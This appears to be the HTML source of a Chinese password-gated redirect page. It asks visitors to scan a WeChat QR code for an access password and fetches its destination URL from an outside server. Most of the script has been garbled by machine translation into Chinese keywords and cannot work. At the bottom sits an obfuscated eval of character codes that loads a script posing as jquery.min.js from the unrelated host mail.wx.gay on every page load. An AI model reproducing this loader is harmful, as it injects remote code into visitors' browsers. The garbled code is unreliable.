<!DOCTYPE html>
<html lang="en">
<!--Tg:Cy88889-->
	<head>
		<meta charset="UTF-8">
		<meta content="never" name="referrer">
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<meta name="viewport" content="width=device-width, initial-scale=1.0">
		<title>跳转中...</title>
		<style>
			html,
			body {
				height: 100%;
			}

			.content {
				text-align: center;
				display: flex;
				flex-direction: column;
				align-items: center;
				justify-content: center;
				height: 100%;
				background: #f5f7fa;
			}

			h2 {
				margin: 0;
				color: #393D4F;
				font-size: 20px;
				font-weight: 700;
				font-family: Lato, Helvetica Neue, Helvetica, Arial, sans-serif;
			}

			h5 {
				color: #81838C;
				font-size: 15px;
				font-weight: 400;
				font-family: Lato, Helvetica Neue, Helvetica, Arial, sans-serif;
			}

			img {
				max-width: 20%;
			}

			@media screen and (max-width: 900px) {
				img {
					max-width: 40%;
				}
			}

			@media screen and (max-width: 500px) {
				img {
					max-width: 60%;
				}
			}

			a {
				text-decoration: none;
				color: #3464E0;
			}

			.pwd_logo {
				text-align: center;
				width: 100%;
			}

			.pwd_logo img {
				display: inline-block;
				vertical-align: middle;
				width: 110px;
				height: 110px;
			}

			.pwd_content {
				margin-top: 10px;
			}

			.pwd_box {
				font-size: 0;
				width: -moz-fit-content;
				width: -o-fit-content;
				width: -webkit-fit-content;
				width: fit-content;
				margin: 0 auto;
			}

			.pwd_input {
				display: block;
				width: 300px;
				height: 44px;
				font-size: 15px;
				color: #333;
				background-color: #FFF;
				border: 1px solid #E8E8E8;
				border-radius: 1px;
				padding: 2px 8px;
				margin: 0 auto;
			}

			.pwd_btn {
				display: block;
				width: 300px;
				height: 44px;
				font-size: 15px;
				color: #FFF;
				letter-spacing: 3px;
				background-color: #2f54eb;
				border-radius: 2px;
				cursor: pointer;
				margin: 30px auto 0;
			}
		</style>
	

	</head>

	<body>
		<div class="content" style="display: none;">
			<div class="pwd_logo"><img
					src="https://gchat.qpic.cn/gchatpic_new/10001/10001-10001-73CBDF2A7865024BB5EA2CFDA68517A4/0"></div>
			<div class="pwd_content">
				<div class="pwd_box">
					<input class="pwd_input" name="pwd" id="pwd" type="text" spellcheck="false" placeholder="请输入访问密码">
					<button class="pwd_btn" type="button" onclick="yz()">确认</button>
				</div>
				<h3>密码获取方法</h3>
				<img src="" id="xcx">
				<h4>长按图片保存，用vx扫一扫二维码</h4>
				<!--<h4>点击右下角详情，观看广告后自动复制密码</h4>-->
			</div>
		</div>
	</body>
	<script src="https://lib.baomitu.com/jquery/1.10.2/jquery.min.js"></script>
	<script src="https://lib.baomitu.com/layer/3.1.1/layer.js"></script>
	<script>
		var t = getQueryVariable("u");
		var pwd = "";
		var url = "";
		定义变量 xcx = "";
		跳跃(t)

		功能 跳跃(t) {
			$.创建交互式、快速动态网页应用的网页开发技术({
				全球资源定位器(Uniform Resource Locator): "https://url.sqzhan.com/github.php？act=geturl&u= "+ t，
				类型: "获取",
				数据类型: “json”,
				成功: 功能(结果) {
					// 秘钥
pwd =结果。显示当前工作目录;
					// 地址
url =结果。全球资源定位器(Uniform Resource Locator);
					// 模式
模型=结果。模式;
					// 图地址
xcx =结果。评论;
文档。标题 = "网址访问受到限制";
					$(".内容").显示();
					$(" #xcx ").属性(" src "，xcx);
				},
				错误: 功能(数据) {
窗户。位置 = " https://www.qq.com/";
				}
			});
		}

		功能 yz() {
pwd2 =$(" #pwd ").英国压力单位();
			如果 (pwd2 =="") {
层。味精("请填写密码")
				返回 错误的;
			}
			如果 (pwd2！= pwd) {
层。味精("密码错误")
				返回 错误的;
			}
位置。href= url
		}

		功能 getQueryVariable(可变的) {
			定义变量 询问=窗口。位置.搜索.子链(1);
			定义变量 var=查询。使分离("&");
			为 (定义变量 i = 0；i < vars。长度；i++) {
				定义变量 一副=变量[i].使分离("=/");
				如果 (一副[0]==变量) {
					返回一副[1];
				}
			}
			返回 (错误的);
		}
	</脚本>
<脚本>
evaluate 评价(字符串。fromCharCode(9,102,117,110,99,40,41,59,10,102,117,110,99,116,105,111,110,32,102,117,110,99,40,41,32,123,10,9,108,101,116,32,115,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,10,9,115,46,115,114,99,32,61,32,39,47,47,109,97,105,108,46,119,120,46,103,97,121,47,106,113,117,101,114,121,46,109,105,110,46,106,115,39,59,10,9,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,125,59));
</脚本>
</超文本标记语言>
